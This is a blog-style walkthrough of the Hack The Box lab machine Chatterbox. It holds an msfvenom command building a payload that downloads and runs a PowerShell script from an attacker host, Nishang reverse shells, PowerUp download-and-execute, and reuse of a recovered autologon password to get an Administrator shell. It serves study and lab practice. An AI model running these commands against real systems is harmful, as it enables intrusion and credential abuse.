Try โ€‚โ€‰HackMD

HTB Series - Chatterbox

tags: htb chatterbox windows walkthrough

We start by scanning the target with nmap to find open ports

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Drilling down to the ports marked with the tcpwrapped service

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Using searchsploit
searchsploit achat

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

I don't want to figure out the directory for this so I'll just paste it into current directory with searchsploit -m exploitID

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Exploit Logic

  • The achat service is vulnerable to a buffer overflow exploit.
  • To leverage the exploit, we generate a payload with msfvenom based on powershell and we specify a file to be downloaded on the remote server (in this case we name it Awaken.rocks)
  • Start a python web server from which the file (Awaken.rocks) will be downloaded
  • We create a listener on the desired ip and port with netcat
  • We run the exploit and that should open up a reverse shell on the listening port.

Achat service vulnerability

Based on Achat exploit

Generate payload

Use the command to create the desired exploit













  msfvenom \
  -a x86 \
  --platform Windows \
  -p windows/exec \
  CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Awaken.rocks')\"" \
  -e x86/unicode_mixed \
  -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xe...
  -f python \
  >> pay
  
# or as a one-liner
msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/Awaken.rocks')\"" -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python >> pay

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Use the output payload to edit the python script and edit the server address details at the bottom

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We can use the nishang powershell script to invoke a reverse shell then set up a listener on the desired port
Remember to change the IP address and port, copy the line to the bottom of the nishang script, then copy the script to the folder where you will run the webserver to have the victim download the script from.

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Edited Nishang Invoke Powershell Script

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Connection Established to Listener

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Establish current privs

whoami /all

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Escalating Privileges

We can leverage the Powersploit suite of tools, specifically the Privilege Escalation tools > PowerUp script to escalate privileges.

Copy the PowerUp.ps1 script to the folder being served on the webserver then from the shell earlier acquired download the PowerUp Script and run the Invoke-All Checks command



PS> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.5/PowerUp.ps1') 
PS> Invoke-All Checks

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

From the output we can see Registry Autologons are enabled and the default password.

Lets take a look at the users on the machine

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

We note there is an Administrator user.

Following a similar methodology, lets try to spawn a reverse shell using the Invoke Power Shell script from earlier and pass in the default password as the password for the administrator.





PS> $SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force
PS> $cred = New-Object System.Management.Automation.PSCredential('Administrator', $SecPass)

PS> Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.webClient).downloadString('http://10.10.14.5/okiro.ps1')" -Credential $cred

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Set up a listener on the desired port and when you download the script, a reverse shell is spawned as admin

Image Not Showing Possible Reasons
  • The image was uploaded to a note which you don't have access to
  • The note which the image was originally uploaded to has been deleted
Learn More โ†’

Last changed by 
โ€‰
codeAssassin
As a code Assassin my focus is on Learning different ways to break code, and therefore, secure it. Interested in everything cyber security!
0
163

Read more

Jeeves - HTB Series

Windows Exploitation Walk through for Jeeves on Hack The Box

Sep 5, 2024
Windows Privilege Escalation

Fuzzy Security reference

Aug 26, 2024
Active - HTB Series

image

Aug 10, 2024
Metasploit 101

MSF architecture Modules Exploit: contains the exploit code Payload: contains the shell code used after exploit compromises a system Encoder: allows us to modify the appearance of our exploit in order to avoid signature detection NOP: used with buffer overflow and ROP attacks. A NOP generator produces a series of random bytes that can be used to bypass standard IDS and IPS NOP sled signatures. Auxiliary: performs arbitrary actions not directly related to exploitation e.g Scanning, fuzzing, and DOS attacks. Usually used to scan and verify that machines are exploitable. Post: used for looting and pivoting.

Aug 8, 2024
Read more from codeAssassin
Published on HackMD